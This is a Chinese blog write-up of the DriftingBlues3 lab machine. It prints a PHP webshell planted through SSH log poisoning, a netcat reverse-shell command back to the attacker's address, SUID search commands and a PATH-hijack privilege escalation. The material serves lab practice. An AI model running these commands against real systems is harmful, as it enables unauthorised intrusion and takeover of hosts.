首页 > 其他分享 >vulhub-driftingblues3

vulhub-driftingblues3

时间:2024-05-29 10:37:31浏览次数:24  
标签:vulhub 192.168 perm driftingblues3 命令 ssh php find

发现 /robots.txt -> /eventadmins/ -> /littlequeenofspades.html -> /adminsfixit.php

界面包含ssh日志,通过尝试发现ssh连接后会更新日志,使用php一句话木马 ssh  -l '<?php system($_GET[\"cmd\"]);?>'  192.168.56.111
在kali下运行此命令出现错误:

~ >> ssh  -l '<?php system($_GET[\"cmd\"]);?>'  192.168.56.111
remote username contains invalid characters

使用windows下powershell运行后成功

反弹shell driftingblues.box/adminsfixit.php?cmd=nc 192.168.56.1 8000 -e /bin/bash

可见 .ssh 目录是其他用户可写的,生成ssh私钥用于登录 ssh-keygen -t rsa

提取套路:

  1. linpeas.sh 脚本信息收集
  2. pspy 监听进程
  3. find命令搜索权限为s的命令

通过命令搜索权限为 s 的命令:

find / -type f  -perm -04000 -o -perm -02000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

可见 /usr/bin/getinfo 是自定义脚本,自己定义命令 cat ip 等使getinfo脚本在调用过程中启动shell

标签:vulhub,192.168,perm,driftingblues3,命令,ssh,php,find
From: https://www.cnblogs.com/zhh567/p/18219580

相关文章

  • 记录很久没用Ubuntu遇到的问题,并安装vulhub漏洞环境(Docker已装好)
    前景提要:之前有装过vulhub,但是今天想复现一下shiro反序列化漏洞(CVE-2016-4437),查看我下载的vulhub,没有找到。就打算更新(顺便提一嘴,更新命令为:gitpull,要先关闭docker),但是我一更新就VMware就弹出“对文件“……\VirtualMachines\Ubuntu64位\Ubuntu64位-000001.vmdk”的操作失......
  • vulhub中Apache Solr 远程命令执行漏洞复现(CVE-2019-0193)
    ApacheSolr是一个开源的搜索服务器。Solr使用Java语言开发,主要基于HTTP和ApacheLucene实现。此次漏洞出现在ApacheSolr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataC......
  • Kali学习笔记07-部署vulhub靶机
    Kali学习笔记07-部署vulhub靶机KaliLinux网络安防一、下载vulhub从vulhub的github网站vulhub/vulhub上下载它的压缩包,得到一个叫做vulhub-master.zip的压缩包。二、解压缩unzipvulhub-master.zip三、进入到某一个漏洞目录中enterdescriptionhere四、自......
  • vulhub-driftingblues
    driftingblues1nmap-sn192.168.56.1/24#主机ip发现#端口扫描nmap-A-v192.168.56.108Discoveredopenport80/tcpon192.168.56.108Discoveredopenport22/tcpon192.168.56.108PORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.2p2Ubuntu4ubu......
  • vulhub中spring的CVE-2018-1273漏洞复现
    ​ 1.影响版本SpringDataCommons1.13-1.13.10(IngallsSR10)SpringDataREST2.6-2.6.10(IngallsSR10)SpringDataCommons2.0to2.0.5(KaySR5)SpringDataREST3.0-3.0.5(KaySR5)2.漏洞原理SpringData是一个用于简化数据库访问,并支持云服务的开源框......
  • vulhub thinphp 5.0.23 学习复现
     靶场是基于vulhub的靶场docker-composeup-d 启动靶场并且漏洞环境是thinkphp5.0.23 现在验证漏洞列出了当前目录文件 可以,验证完了,看到漏洞存在 现在想尝试弹一个shell,开启监听  ok!bp可以,但是,查看服务器并未得到shell不清楚是为什么,等下再看,先拿web......
  • vulhub的使用
    1、将搭载的vulhub靶场的虚拟机当作靶机通过ssh服务连接靶机vulhub漏洞库已经搭建在根目录下,目录名为“vulhub-master”: 2、用cd命令逐级进入其中,根据目录名选择想要复现的漏洞,例如下图想要复现wordpress的漏洞,就cd进入wordpress目录下,有时候其中会有多个漏洞,就会有多个文件......
  • vulhub靶场搭建
    配置Docker1、更新sudoapt-getupdate2、下载安装dockersudoaptinstalldocker.io中间碰到询问回复y 3、查看是否安装成功docker-v 4、安装docker-composeaptinstalldocker-compose 5、查看docker-compose安装是否成功docker-compose-v6、配置vulhub......
  • Centos7环境下Docker搭建vulhub
    @[toc]Docker是一个开源的应用容器引擎,可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化。varcode="7ba6071e-929c-4a38-8b5d-49be072baba6"vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机......
  • log4j2---基于vulhub的log4j2漏洞复现---反弹shell
    基于vulhub的log4j2漏洞复现---反弹shell1.方法一环境准备:和我上一篇fastjson1.2.24漏洞复现是一样的环境,方法也差别不大声明:遵纪守法,仅作学习记录用处,部分描述文字源于网络,若侵权联系删除老演员:centos8:192.168.59.135vulhub靶场win10:192.168.59.130攻击机......